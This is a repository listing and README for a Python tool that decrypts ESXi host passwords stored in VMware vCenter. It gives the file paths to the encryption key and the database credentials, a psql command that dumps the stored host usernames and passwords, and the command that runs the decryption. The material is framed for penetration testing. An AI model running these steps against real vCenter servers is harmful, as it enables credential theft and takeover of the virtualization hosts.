https://github.com/shmilylty/vhost_password_decrypt

vhost password decrypt
https://github.com/shmilylty/vhost_password_decrypt

Last synced: 23 days ago
JSON representation

vhost password decrypt

• Host: GitHub
• URL: https://github.com/shmilylty/vhost_password_decrypt
• Owner: shmilylty
• Created: 2021-12-13T09:47:36.000Z (over 3 years ago)
• Default Branch: main
• Last Pushed: 2024-10-09T05:34:17.000Z (7 months ago)
• Last Synced: 2025-04-03T21:13:12.270Z (about 1 month ago)
• Language: Python
• Size: 13.7 KB
• Stars: 244
• Watchers: 3
• Forks: 62
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

• awesome-hacking-lists - shmilylty/vhost_password_decrypt - vhost password decrypt (Python)

README

        
# vhost_password_decrypt

## Where is symkey.dat

Windows：C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat

Linux：/etc/vmware-vpx/ssl/symkey.dat

## Where is postgres user password

Windows: C:\ProgramData\VMware\vCenterServer\cfg\vmware-vps\vcdb.properties

Linux：

/etc/vmware-vpx/vcdb.properties

/etc/vmware/service-state/vpxd/vcdb.properties

## Where is psql

Windows: C:\Program Files\VMware\vCenter Server\vPostgres\bin\psql.exe

Linux: /opt/vmware/vpostgres/9.3/bin/psql

## export 

psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc

## How to use

pip3 install pycryptodome

python3 decrypt.py symkey.dat password.enc password.txt

![image](https://user-images.githubusercontent.com/24275308/145789863-3911ce8b-b6e1-4114-b051-1cb0c4df5068.png)

# How this might help during a pentest / tutorial 

see the end -> https://pentera.io/blog/information-disclosure-in-vmware-vcenter/